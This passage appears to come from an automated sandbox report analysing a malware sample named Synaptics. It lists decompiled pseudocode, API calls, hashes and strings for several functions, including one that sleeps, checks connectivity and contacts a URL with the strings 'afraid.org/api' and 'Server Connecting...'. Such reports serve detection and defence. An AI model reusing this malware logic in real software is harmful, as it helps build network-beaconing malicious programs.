						_t30 =  *0x49f118; // 0x21e2f48
						E00474FC0(_t30, __ebx,  &_v12, __esi);
						E00475110(_v12, __ebx, 1, 0x7c, __edi, __esi, _t65,  &_v8);
						E00404A14(0x49f118, _v8);
					}
					_t22 =  *0x49f114; // 0x21e4244
					 *((intOrPtr*)( *_t22 + 0x88))();
					_t24 =  *0x49f114; // 0x21e4244
					 *((intOrPtr*)( *_t24 + 0x8c))();
					_t26 =  *0x49f114; // 0x21e4244
					 *((intOrPtr*)( *_t26 + 0x94))();
					_pop(_t54);
					 *[fs:eax] = _t54;
				}
				_pop(_t47);
				 *[fs:eax] = _t47;
				_push(E00495B75);
				return E004049E4( &_v28, 6);
			}


















                                                                                                                                                                                                                            0x00495931
                                                                                                                                                                                                                            0x00495935
                                                                                                                                                                                                                            0x00495936
                                                                                                                                                                                                                            0x00495937
                                                                                                                                                                                                                            0x00495938
                                                                                                                                                                                                                            0x00495939
                                                                                                                                                                                                                            0x0049593a
                                                                                                                                                                                                                            0x0049593b
                                                                                                                                                                                                                            0x0049593c
                                                                                                                                                                                                                            0x0049593d
                                                                                                                                                                                                                            0x00495940
                                                                                                                                                                                                                            0x00495941
                                                                                                                                                                                                                            0x00495946
                                                                                                                                                                                                                            0x00495949
                                                                                                                                                                                                                            0x00495951
                                                                                                                                                                                                                            0x0049595d
                                                                                                                                                                                                                            0x00495b49
                                                                                                                                                                                                                            0x00495b4e
                                                                                                                                                                                                                            0x00495963
                                                                                                                                                                                                                            0x00495963
                                                                                                                                                                                                                            0x0049596f
                                                                                                                                                                                                                            0x00495976
                                                                                                                                                                                                                            0x00495977
                                                                                                                                                                                                                            0x0049597c
                                                                                                                                                                                                                            0x0049597f
                                                                                                                                                                                                                            0x00495982
                                                                                                                                                                                                                            0x0049598d
                                                                                                                                                                                                                            0x00495992
                                                                                                                                                                                                                            0x00495994
                                                                                                                                                                                                                            0x0049599d
                                                                                                                                                                                                                            0x004959a2
                                                                                                                                                                                                                            0x004959b1
                                                                                                                                                                                                                            0x004959be
                                                                                                                                                                                                                            0x004959be
                                                                                                                                                                                                                            0x004959c9
                                                                                                                                                                                                                            0x004959d0
                                                                                                                                                                                                                            0x004959dc
                                                                                                                                                                                                                            0x004959e3
                                                                                                                                                                                                                            0x004959ef
                                                                                                                                                                                                                            0x004959f6
                                                                                                                                                                                                                            0x004959fe
                                                                                                                                                                                                                            0x00495a01
                                                                                                                                                                                                                            0x00495a01
                                                                                                                                                                                                                            0x00495b55
                                                                                                                                                                                                                            0x00495b58
                                                                                                                                                                                                                            0x00495b5b
                                                                                                                                                                                                                            0x00495b6d

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • Sleep.KERNEL32(000003E8,00000000,00495B6E,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00495951
                                                                                                                                                                                                                              • Part of subcall function 00474D34: InternetGetConnectedState.WININET(?,00000000), ref: 00474D41
                                                                                                                                                                                                                              • Part of subcall function 00474FC0: InternetOpenA.WININET(MyApp,00000000,00000000,00000000,00000000), ref: 00474FF9
                                                                                                                                                                                                                              • Part of subcall function 00474FC0: InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,84000000,00000000), ref: 00475030
                                                                                                                                                                                                                              • Part of subcall function 00474FC0: InternetReadFile.WININET(00000000,?,00000400,00000400), ref: 0047506B
                                                                                                                                                                                                                              • Part of subcall function 00474FC0: InternetCloseHandle.WININET(00000000), ref: 004750B7
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Internet$Open$CloseConnectedFileHandleReadSleepState
                                                                                                                                                                                                                            • String ID: Server Connecting...$afraid.org/api
                                                                                                                                                                                                                            • API String ID: 484477557-4171305320
                                                                                                                                                                                                                            • Opcode ID: ca225c59d7472dc7e924654345b9cddd3364972001b53c89043e382a6609afca
                                                                                                                                                                                                                            • Instruction ID: 1742280dbad9834e3b98c72a481cfe9cad1f0a6ad81f0c4a7812aa737afa5612
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca225c59d7472dc7e924654345b9cddd3364972001b53c89043e382a6609afca
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E0219074300600DFD701DB65E853D5A3BA5EB89314B61807BF800C7792DA39AC09CBAD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004034E8 Relevance: 4.6, APIs: 3, Instructions: 69fileCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 72%
                                                                                                                                                                                                                            			E004034E8(void** __eax, void* __ecx, void* __edx) {
				void* _t15;
				long _t16;
				long _t18;
				void** _t22;
				long _t24;
				signed int _t29;
				long _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t37;

				_t37 = __edx;
				_t33 = __ecx;
				_t22 = __eax;
				if(0xffffffffffff2850 == 0) {
					L4:
					_t22[1] = 0xd7b3;
					_t22[2] = _t37;
					_t22[9] = 0x4034c0;
					_t22[7] = E00402D00;
					if(_t22[0x12] == 0) {
						_t22[9] = E00402D00;
						if(_t33 == 3) {
							_t15 = GetStdHandle(0xfffffff5);
						} else {
							_t15 = GetStdHandle(0xfffffff6);
						}
					} else {
						_t18 = 0xc0000000;
						_t29 =  *0x49b00c; // 0x0
						_t32 =  *(((_t29 & 0x00000070) >> 2) + 0x49b06c);
						_t24 = 2;
						_t34 = _t33 - 3;
						if(_t34 != 0) {
							_t24 = 3;
							_t35 = _t34 + 1;
							if(_t35 != 0) {
								_t18 = 0x40000000;
								_t22[1] = 0xd7b2;
								if(_t35 + 1 != 0) {
									_t18 = 0x80000000;
									_t22[1] = 0xd7b1;
								}
							}
						}
						_t15 = CreateFileA( &(_t22[0x12]), _t18, _t32, 0, _t24, 0x80, 0); // executed
					}
					if(_t15 == 0xffffffff) {
						_t22[1] = 0xd7b0;
						_t16 = GetLastError();
						L18:
						return E004028E4(_t16);
					} else {
						 *_t22 = _t15;
						return _t15;
					}
				}
				if(0xffffffffffff2850 > 3) {
					_t16 = 0x66;
					goto L18;
				}
				if( *((intOrPtr*)(__eax + 0x24))() != 0) {
					E004028E4(_t20);
				}
				goto L4;
			}














                                                                                                                                                                                                                            0x004034eb
                                                                                                                                                                                                                            0x004034ed
                                                                                                                                                                                                                            0x004034f1
                                                                                                                                                                                                                            0x004034fd
                                                                                                                                                                                                                            0x00403514
                                                                                                                                                                                                                            0x00403514
                                                                                                                                                                                                                            0x0040351a
                                                                                                                                                                                                                            0x0040351d
                                                                                                                                                                                                                            0x00403524
                                                                                                                                                                                                                            0x0040352f
                                                                                                                                                                                                                            0x00403591
                                                                                                                                                                                                                            0x0040359b
                                                                                                                                                                                                                            0x004035a3
                                                                                                                                                                                                                            0x0040359d
                                                                                                                                                                                                                            0x004035a3
                                                                                                                                                                                                                            0x004035a3
                                                                                                                                                                                                                            0x00403531
                                                                                                                                                                                                                            0x00403531
                                                                                                                                                                                                                            0x00403536
                                                                                                                                                                                                                            0x00403542
                                                                                                                                                                                                                            0x00403548
                                                                                                                                                                                                                            0x0040354d
                                                                                                                                                                                                                            0x00403550
                                                                                                                                                                                                                            0x00403552
                                                                                                                                                                                                                            0x00403557
                                                                                                                                                                                                                            0x00403558
                                                                                                                                                                                                                            0x0040355a
                                                                                                                                                                                                                            0x00403560
                                                                                                                                                                                                                            0x00403566
                                                                                                                                                                                                                            0x00403568
                                                                                                                                                                                                                            0x0040356d
                                                                                                                                                                                                                            0x0040356d
                                                                                                                                                                                                                            0x00403566
                                                                                                                                                                                                                            0x00403558
                                                                                                                                                                                                                            0x00403583
                                                                                                                                                                                                                            0x00403583
                                                                                                                                                                                                                            0x0040358b
                                                                                                                                                                                                                            0x004035b1
                                                                                                                                                                                                                            0x004035b7
                                                                                                                                                                                                                            0x004035bc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040358d
                                                                                                                                                                                                                            0x0040358d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040358d
                                                                                                                                                                                                                            0x0040358b
                                                                                                                                                                                                                            0x00403502
                                                                                                                                                                                                                            0x004035aa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004035aa
                                                                                                                                                                                                                            0x0040350d
                                                                                                                                                                                                                            0x0040350f
                                                                                                                                                                                                                            0x0040350f
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,?,00000000,00000002,00000080,00000000,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000), ref: 00403583
                                                                                                                                                                                                                            • GetStdHandle.KERNEL32(000000F5,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000,00474E92,?,00000000,00474F77), ref: 004035A3
                                                                                                                                                                                                                            • GetLastError.KERNEL32(000000F5,?,?,?,004035EE,00474E0F,00000000,00474E74,?,00000000,00474E92,?,00000000,00474F77), ref: 004035B7
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CreateErrorFileHandleLast
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1572049330-0
                                                                                                                                                                                                                            • Opcode ID: c8eac1bd2ae1f70e96429ff86d89176e80f32e19ecca17d28057418124fa5a47
                                                                                                                                                                                                                            • Instruction ID: 1e67efa80632d682362f14ea232ee9a6b3403708de1835596950b0ec37a53b76
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8eac1bd2ae1f70e96429ff86d89176e80f32e19ecca17d28057418124fa5a47
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3911EB61504100BAEB149F19CD887566D5D9F81319F28C2BBD419BF3F9D67CCE4093AD
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045A4E8 Relevance: 4.6, APIs: 3, Instructions: 59windowCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                                                                            			E0045A4E8(void* __eax, char* __ecx, struct tagMSG* __edx) {
				int _t7;
				int _t21;
				MSG* _t30;
				void* _t31;
				char* _t32;

				_t22 = __ecx;
				_push(__ecx);
				_t30 = __edx;
				_t31 = __eax;
				_t21 = 0;
				_t7 = PeekMessageA(__edx, 0, 0, 0, 1); // executed
				if(_t7 != 0) {
					_t21 = 1;
					if(_t30->message == 0x12) {
						 *((char*)(_t31 + 0x9c)) = 1;
					} else {
						 *_t32 = 0;
						if( *((short*)(_t31 + 0xda)) != 0) {
							_t22 = _t32;
							 *((intOrPtr*)(_t31 + 0xd8))();
						}
						if(E0045A448(_t31, _t30) == 0 &&  *_t32 == 0 && E0045A340(_t31, _t30) == 0 && E0045A390(_t31, _t22, _t30) == 0 && E0045A31C(_t31, _t30) == 0) {
							TranslateMessage(_t30);
							DispatchMessageA(_t30); // executed
						}
					}
				}
				return _t21;
			}








                                                                                                                                                                                                                            0x0045a4e8
                                                                                                                                                                                                                            0x0045a4eb
                                                                                                                                                                                                                            0x0045a4ec
                                                                                                                                                                                                                            0x0045a4ee
                                                                                                                                                                                                                            0x0045a4f0
                                                                                                                                                                                                                            0x0045a4fb
                                                                                                                                                                                                                            0x0045a502
                                                                                                                                                                                                                            0x0045a504
                                                                                                                                                                                                                            0x0045a50a
                                                                                                                                                                                                                            0x0045a572
                                                                                                                                                                                                                            0x0045a50c
                                                                                                                                                                                                                            0x0045a50c
                                                                                                                                                                                                                            0x0045a518
                                                                                                                                                                                                                            0x0045a51a
                                                                                                                                                                                                                            0x0045a524
                                                                                                                                                                                                                            0x0045a524
                                                                                                                                                                                                                            0x0045a535
                                                                                                                                                                                                                            0x0045a565
                                                                                                                                                                                                                            0x0045a56b
                                                                                                                                                                                                                            0x0045a56b
                                                                                                                                                                                                                            0x0045a535
                                                                                                                                                                                                                            0x0045a50a
                                                                                                                                                                                                                            0x0045a57f

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 0045A4FB
                                                                                                                                                                                                                            • TranslateMessage.USER32 ref: 0045A565
                                                                                                                                                                                                                            • DispatchMessageA.USER32 ref: 0045A56B
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Message$DispatchPeekTranslate
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 4217535847-0
                                                                                                                                                                                                                            • Opcode ID: d5e9e376560588d28cd7a4776222bd9ede00ef77f9ba1b200076287ecf781b44
                                                                                                                                                                                                                            • Instruction ID: 2ed0c1a20c59febfa1985896f2b2d1bc9742e22b53ed284e6756f8042308f4ec
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d5e9e376560588d28cd7a4776222bd9ede00ef77f9ba1b200076287ecf781b44
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E01FE20B04304A6EA31266B6805F6B97854FD27CAF14425FFD45B7393D6AC9C5E423F
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00446564 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 77%
                                                                                                                                                                                                                            			E00446564(void* __ecx, void* __edi, void* __esi) {
				intOrPtr _t6;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t17;
				intOrPtr _t20;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t28;

				_t25 = __esi;
				_t17 = __ecx;
				_push(_t28);
				_push(0x4465ea);
				_push( *[fs:eax]);
				 *[fs:eax] = _t28;
				 *0x49eb20 =  *0x49eb20 - 1;
				if( *0x49eb20 < 0) {
					 *0x49eb1c = (GetVersion() & 0x000000ff) - 4 >= 0; // executed
					_t31 =  *0x49eb1c;
					E00446330(_t16, __edi,  *0x49eb1c);
					_t6 =  *0x436dd0; // 0x436e1c
					E0041A4A8(_t6, _t16, _t17,  *0x49eb1c);
					_t8 =  *0x436dd0; // 0x436e1c
					E0041A548(_t8, _t16, _t17, _t31);
					_t21 =  *0x436dd0; // 0x436e1c
					_t10 =  *0x447948; // 0x447994
					E0041A4F4(_t10, _t16, _t21, __esi, _t31);
					_t22 =  *0x436dd0; // 0x436e1c
					_t12 =  *0x4465f4; // 0x446640
					E0041A4F4(_t12, _t16, _t22, __esi, _t31);
					_t23 =  *0x436dd0; // 0x436e1c
					_t14 =  *0x44675c; // 0x4467a8
					E0041A4F4(_t14, _t16, _t23, _t25, _t31);
				}
				_pop(_t20);
				 *[fs:eax] = _t20;
				_push(0x4465f1);
				return 0;
			}















                                                                                                                                                                                                                            0x00446564
                                                                                                                                                                                                                            0x00446564
                                                                                                                                                                                                                            0x00446569
                                                                                                                                                                                                                            0x0044656a
                                                                                                                                                                                                                            0x0044656f
                                                                                                                                                                                                                            0x00446572
                                                                                                                                                                                                                            0x00446575
                                                                                                                                                                                                                            0x0044657c
                                                                                                                                                                                                                            0x0044658c
                                                                                                                                                                                                                            0x0044658c
                                                                                                                                                                                                                            0x00446593
                                                                                                                                                                                                                            0x00446598
                                                                                                                                                                                                                            0x0044659d
                                                                                                                                                                                                                            0x004465a2
                                                                                                                                                                                                                            0x004465a7
                                                                                                                                                                                                                            0x004465ac
                                                                                                                                                                                                                            0x004465b2
                                                                                                                                                                                                                            0x004465b7
                                                                                                                                                                                                                            0x004465bc
                                                                                                                                                                                                                            0x004465c2
                                                                                                                                                                                                                            0x004465c7
                                                                                                                                                                                                                            0x004465cc
                                                                                                                                                                                                                            0x004465d2
                                                                                                                                                                                                                            0x004465d7
                                                                                                                                                                                                                            0x004465d7
                                                                                                                                                                                                                            0x004465de
                                                                                                                                                                                                                            0x004465e1
                                                                                                                                                                                                                            0x004465e4
                                                                                                                                                                                                                            0x004465e9

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetVersion.KERNEL32(00000000,004465EA), ref: 0044657E
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetCurrentProcessId.KERNEL32(?,00000000,004464A8), ref: 00446351
                                                                                                                                                                                                                              • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 00446384
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetCurrentThreadId.KERNEL32 ref: 0044639F
                                                                                                                                                                                                                              • Part of subcall function 00446330: GlobalAddAtomA.KERNEL32 ref: 004463D5
                                                                                                                                                                                                                              • Part of subcall function 00446330: RegisterClipboardFormatA.USER32 ref: 004463EB
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 0044646F
                                                                                                                                                                                                                              • Part of subcall function 00446330: GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 00446480
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: AtomCurrentGlobal$AddressClipboardFormatHandleModuleProcProcessRegisterThreadVersion
                                                                                                                                                                                                                            • String ID: @fD
                                                                                                                                                                                                                            • API String ID: 3775504709-3452771706
                                                                                                                                                                                                                            • Opcode ID: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                                                            • Instruction ID: a2d0d9fa5674fa572cfd9e012cd62e1639ea6f2d0861d92eee2e079839ffb759
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 95a3d3956bea3f460346f6cd369638779209bac5c04267071be8a34415b91482
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF04F78214241AFE305FF2AFC5291937A4FB86314792947AF400436A6CA3CA851CB0E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 0045EFA8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34registryclipboardCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                                                                                            			E0045EFA8(void* __ecx, void* __edx) {
				void* _t7;
				void* _t12;
				intOrPtr _t16;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t22;
				void* _t23;
				void* _t24;

				_t19 = __edx;
				_t18 = __ecx;
				if(__edx != 0) {
					_t24 = _t24 + 0xfffffff0;
					_t7 = E00403F10(_t7, _t23);
				}
				_t17 = _t19;
				_t22 = _t7;
				E00421B3C(_t18, 0);
				 *((intOrPtr*)(_t22 + 0xea)) = E00403BBC(1);
				if(( *(_t22 + 0x1c) & 0x00000010) == 0) {
					 *((intOrPtr*)(_t22 + 0xd2)) = RegisterClipboardFormatA("MsgId_OrtusShellChangeNotifier");
					_t16 = E00451878(E0045E9EC, _t22); // executed
					 *((intOrPtr*)(_t22 + 0xda)) = _t16;
				}
				_t12 = _t22;
				if(_t17 != 0) {
					E00403F68(_t12);
					_pop( *[fs:0x0]);
				}
				return _t22;
			}












                                                                                                                                                                                                                            0x0045efa8
                                                                                                                                                                                                                            0x0045efa8
                                                                                                                                                                                                                            0x0045efac
                                                                                                                                                                                                                            0x0045efae
                                                                                                                                                                                                                            0x0045efb1
                                                                                                                                                                                                                            0x0045efb1
                                                                                                                                                                                                                            0x0045efb6
                                                                                                                                                                                                                            0x0045efb8
                                                                                                                                                                                                                            0x0045efbe
                                                                                                                                                                                                                            0x0045efcf
                                                                                                                                                                                                                            0x0045efd9
                                                                                                                                                                                                                            0x0045efe5
                                                                                                                                                                                                                            0x0045eff1
                                                                                                                                                                                                                            0x0045eff6
                                                                                                                                                                                                                            0x0045eff6
                                                                                                                                                                                                                            0x0045effc
                                                                                                                                                                                                                            0x0045f000
                                                                                                                                                                                                                            0x0045f002
                                                                                                                                                                                                                            0x0045f007
                                                                                                                                                                                                                            0x0045f00e
                                                                                                                                                                                                                            0x0045f015

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegisterClipboardFormatA.USER32 ref: 0045EFE0
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            • MsgId_OrtusShellChangeNotifier, xrefs: 0045EFDB
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ClipboardFormatRegister
                                                                                                                                                                                                                            • String ID: MsgId_OrtusShellChangeNotifier
                                                                                                                                                                                                                            • API String ID: 1228543026-1463447210
                                                                                                                                                                                                                            • Opcode ID: f8979d51b969080b0751403073583cda04ec3b2a51cbefc876ef6116b0c698af
                                                                                                                                                                                                                            • Instruction ID: 9954d9dd0750aaeb66af585a099ed7c5191191f0ac21a3cbd5b83f5e84ca41d7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f8979d51b969080b0751403073583cda04ec3b2a51cbefc876ef6116b0c698af
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31F0BB62B0061156C220EB7B5C027477EA48F0175AF04443FFC94973D3DA395D0C439E
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004781D4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 41%
                                                                                                                                                                                                                            			E004781D4(void* __eax, void* __ebx, void* __ecx, void* __edx, void* __esi, void* __eflags) {
				char _v8;
				intOrPtr _t21;
				intOrPtr _t26;
				void* _t27;

				_t27 = __eflags;
				_push(0);
				_push(_t26);
				_push(0x478221);
				_push( *[fs:eax]);
				 *[fs:eax] = _t26;
				_t20 = __eax;
				E004051EC( &_v8, __eax);
				_push(E004051FC(_v8)); // executed
				L00417E0C(); // executed
				E004781BC(_t9, _t20, _t27);
				_pop(_t21);
				 *[fs:eax] = _t21;
				_push(E00478228);
				return E004050A0( &_v8);
			}







                                                                                                                                                                                                                            0x004781d4
                                                                                                                                                                                                                            0x004781d7
                                                                                                                                                                                                                            0x004781e1
                                                                                                                                                                                                                            0x004781e2
                                                                                                                                                                                                                            0x004781e7
                                                                                                                                                                                                                            0x004781ea
                                                                                                                                                                                                                            0x004781f1
                                                                                                                                                                                                                            0x004781f3
                                                                                                                                                                                                                            0x00478200
                                                                                                                                                                                                                            0x00478201
                                                                                                                                                                                                                            0x00478206
                                                                                                                                                                                                                            0x0047820d
                                                                                                                                                                                                                            0x00478210
                                                                                                                                                                                                                            0x00478213
                                                                                                                                                                                                                            0x00478220

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • 741EBC30.OLE32(00000000,?,00000000,00478221,?,?,Excel.Application,00000000,?,00478242), ref: 00478201
                                                                                                                                                                                                                              • Part of subcall function 004050A0: SysFreeString.OLEAUT32(088B90C3), ref: 004050AE
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000009.00000002.407426556.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407417906.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407497738.000000000049B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000009.00000002.407508740.00000000004A5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_9_2_400000_Synaptics.jbxd
                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FreeString
                                                                                                                                                                                                                            • String ID: Excel.Application
                                                                                                                                                                                                                            • API String ID: 3341692771-3141931764
                                                                                                                                                                                                                            • Opcode ID: d4df13c63ea33310663f577415f2673a26f61d1dea7470d4c1a0fdc135645ee0
                                                                                                                                                                                                                            • Instruction ID: 5a7791121ba19d98e3bcb4b8c02d80bfc0818dc7363a01a43232f673b92e6833
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d4df13c63ea33310663f577415f2673a26f61d1dea7470d4c1a0fdc135645ee0
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D4E0E530704B087BD701EB62DC52E8E77ECDB4A714BA248BAF400E2642DE3C9E0094A8
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 00431EF8 Relevance: 3.1, APIs: 2, Instructions: 94registryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 66%
                                                                                                                                                                                                                            			E00431EF8(void* __eax, void* __ebx, char __ecx, void* __edx, void* __esi) {
				char _v5;
				char _v6;
				void* _v12;
				char _v16;
				int _v20;
				char* _t40;
				signed int _t43;
				char* _t55;
				signed char _t63;
				intOrPtr _t72;
				void* _t78;
				void* _t81;

				_v16 = 0;
				_v5 = __ecx;
				_t78 = __eax;
				_push(_t81);
				_push(0x431ffd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t81 + 0xfffffff0;
				E00404A58( &_v16, __edx);
				_t63 = E00431D88(_v16);
				if(_t63 == 0) {
					E00404F20( &_v16, 1, 1);
				}
				_v12 = 0;
				if(_v5 == 0 || _v16 == 0) {
					_t40 = E00404E80(_v16);
					_t43 = RegOpenKeyExA(E00431EE4(_t78, _t63), _t40, 0,  *(_t78 + 0x18),  &_v12); // executed
					_v6 = _t43 == 0;
				} else {
					_t55 = E00404E80(_v16);
					_t43 = RegCreateKeyExA(E00431EE4(_t78, _t63), _t55, 0, 0, 0,  *(_t78 + 0x18), 0,  &_v12,  &_v20);
					_v6 = _t43 == 0;
				}
